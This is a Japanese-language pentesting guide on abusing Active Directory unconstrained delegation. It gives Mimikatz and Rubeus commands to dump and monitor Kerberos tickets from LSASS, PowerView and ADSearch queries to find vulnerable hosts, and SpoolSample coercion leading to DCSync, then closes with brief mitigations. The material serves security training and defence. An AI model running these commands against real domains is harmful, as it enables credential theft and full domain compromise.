制約のない委任

これは、ドメイン管理者がドメイン内の任意のコンピュータに設定できる機能です。その後、ユーザーがコンピュータにログインするたびに、そのユーザーのTGTのコピーがDCが提供するTGSに送信され、LSASSのメモリに保存されます。したがって、そのマシンで管理者特権を持っている場合、チケットをダンプしてユーザーをなりすますことができます。

したがって、ドメイン管理者が「制約のない委任」機能が有効になっているコンピュータにログインし、そのマシンでローカル管理者特権を持っている場合、チケットをダンプしてどこでもドメイン管理者になりすますことができます（ドメイン昇格）。

この属性を持つコンピュータオブジェクトを見つけるには、userAccountControl属性がADS_UF_TRUSTED_FOR_DELEGATIONを含んでいるかどうかを確認します。これは、powerviewが行う方法です。LDAPフィルター '（userAccountControl:1.2.840.113556.1.4.803:=524288）'を使用してこれを行うことができます。

# 制約のないコンピュータのリスト
## Powerview
Get-NetComputer -Unconstrained #DCは常に表示されますが、昇格には役立ちません
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Mimikatzでチケットをエクスポート
privilege::debug
sekurlsa::tickets /export #推奨される方法
kerberos::list /export #別の方法

# ログインを監視して新しいチケットをエクスポート
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #新しいTGTを10秒ごとにチェック

MimikatzまたはRubeusを使用して管理者（または被害者ユーザー）のチケットをメモリにロードし、Pass the Ticketを行います。 詳細情報: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ ired.teamのUnconstrained delegationに関する詳細情報

強制認証

攻撃者が「制約のない委任」に許可されたコンピュータを侵害できる場合、プリントサーバーをトリックして自動的にログインさせ、サーバーのメモリにTGTを保存できます。 その後、攻撃者は、ユーザープリントサーバーコンピューターアカウントをなりすましてPass the Ticket攻撃を実行できます。

プリントサーバーを任意のマシンにログインさせるには、SpoolSampleを使用できます。

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

もしTGTがドメインコントローラーからである場合、DCSync攻撃を実行し、DCからすべてのハッシュを取得することができます。 この攻撃に関する詳細はired.teamを参照してください。

他に認証を強制する方法は以下の通りです:

緩和策

• 特定のサービスに対するDA/Adminログインを制限する

• 特権アカウントに対して「アカウントは機密であり委任できません」を設定する。